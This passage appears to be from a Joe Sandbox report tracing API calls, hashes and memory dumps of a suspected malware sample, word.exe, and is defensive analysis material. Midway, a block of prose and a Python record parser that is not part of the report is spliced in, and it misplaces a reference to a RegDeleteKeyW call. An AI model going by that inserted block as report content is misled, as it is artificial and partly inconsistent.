                                                                            • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                            • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                            • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                            APIs
                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID: *.*
                                                                            • API String ID: 1795658109-438819550
                                                                            • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                            • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                            • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                            • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                            • GetFocus.USER32(?,00000001,004848E8,004848E8,?), ref: 004609EF
                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                            • EnumChildWindows.USER32 ref: 00460A60
                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 991886796-1110647743
                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_sprintf
                                                                            • String ID: %02X
                                                                            • API String ID: 891462717-436463671
                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?), ref: 00410150
                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                            • String ID: $OH$@OH$X
                                                                            • API String ID: 3491138722-1394974532
                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?), ref: 00463E68
                                                                            • GetProcAddress.KERNEL32(?,00000000,?), ref: 00463E84
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,00000000,?), ref: 00463ECE
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 2449869053-0
                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 3031425849-0
                                                                            • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                            • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                            • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                            • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
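Each function record in this part of the report follows one fixed layout: an APIs list (direct calls plus "Part of subcall function" lines), an optional Strings list, the Memory Dump Source, the IDA Plugin snapshot file, and a Similarity block carrying the API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes. The Python below is an added example, not Joe Sandbox code, that parses a run of such records into structured objects so the call sites of a given API can be listed and the Similarity identifiers collected for cross-sample comparison. The sample input is a shortened copy of two records from this section (the page's "Download File" link labels dropped, most Associated lines omitted); the section names and the line regex are inferred from the records visible here, and nothing is assumed about how the hashes themselves are computed.

```python
"""Parser for Joe Sandbox IDA Plugin function records (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied, shortened, from the report section above.
SAMPLE_REPORT = """\
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 004438B7
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CurrentHandleProcess$Duplicate
• String ID: nul
• API String ID: 2124370227-2873401336
• Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
• Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
• Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
• Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
APIs
• LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
• GetProcAddress.KERNEL32(?,?,?,?,?), ref: 00463E68
• GetProcAddress.KERNEL32(?,00000000,?), ref: 00463E84
• FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
• Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
• Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
• Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
• Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
"""

# "Name.MODULE(args), ref: ADDR"; the argument list and the comma are optional
# ("DuplicateHandle.KERNEL32 ref: 004356C4") and subcall lines carry a caller prefix.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Section headers as they appear in the records on this page (assumed to be the full set).
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    caller: str = ""  # address of the subcall function, empty for a direct call


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source_file: str = ""
    associated: list = field(default_factory=list)
    snapshot: str = ""
    similarity: dict = field(default_factory=dict)

    @property
    def instruction_fuzzy_hash(self):
        return self.similarity.get("Instruction Fuzzy Hash", "")


def parse_records(text):
    """Split report text into FunctionRecord objects; every record opens with 'APIs'."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue  # text outside a record, or a non-bullet line we do not model
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_LINE.match(body)
            if m is None:
                raise ValueError("unrecognised API line: " + body)
            args = [a for a in (m["args"] or "").split(",") if a]
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"] or ""))
        elif section == "Strings":
            current.strings.append(body)
        elif section == "Memory Dump Source":
            key, _, value = body.partition(": ")
            if key == "Source File":
                current.source_file = value.split(",", 1)[0]  # drop ", Offset: ..., based on PE: ..."
            elif key == "Associated":
                current.associated.append(value)
        elif section == "Joe Sandbox IDA Plugin":
            key, _, value = body.partition(": ")
            if key == "Snapshot File":
                current.snapshot = value
        elif section == "Similarity":
            key, _, value = body.partition(":")  # "String ID:" may have an empty value
            current.similarity[key.strip()] = value.strip()
    return records


def callers_of(records, api_name):
    """(ref, caller) for every call site of api_name across all records."""
    return [(c.ref, c.caller) for r in records for c in r.apis if c.name == api_name]


def api_string_index(records):
    """Group records by the 'API String ID' listed under Similarity."""
    index = {}
    for r in records:
        index.setdefault(r.similarity.get("API String ID", ""), []).append(r)
    return index
```

Records from several reports can be fed through parse_records and joined on the Similarity identifiers to find functions shared between samples, while callers_of gives the reference addresses to jump to in the dumped image when reviewing a specific API such as the RegDeleteKeyW call listed above.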
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 0044232B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 2095303065-0
                                                                            • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                            • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                            • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                            • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0045C2F4
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0045C31B
                                                                            • WritePrivateProfileSectionW.KERNEL32 ref: 0045C363
                                                                            • WritePrivateProfileStringW.KERNEL32 ref: 0045C385
                                                                            • WritePrivateProfileStringW.KERNEL32 ref: 0045C392
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 659298297-0
                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                            APIs
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(002BE158,000000F1,00000000,00000000), ref: 004414C6
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(002BE158,000000F1,00000001,00000000), ref: 004414F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                            • String ID:
                                                                            • API String ID: 142311417-0
                                                                            • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                            • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                            • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                            • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044955A
                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                            • _wcslen.LIBCMT ref: 004495C1
                                                                            • _wcslen.LIBCMT ref: 004495CE
                                                                            • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1843234404-0
                                                                            • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                            • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                            • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                            • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                            • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                            • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                            • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00445721
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                            • _wcslen.LIBCMT ref: 004457A3
                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3087257052-0
                                                                            • Opcode ID: 26db20d7f247ea922bda5968985a175caa13d0c4701d936ec62fbed3d9b395f5
                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                            • Opcode Fuzzy Hash: 26db20d7f247ea922bda5968985a175caa13d0c4701d936ec62fbed3d9b395f5
                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
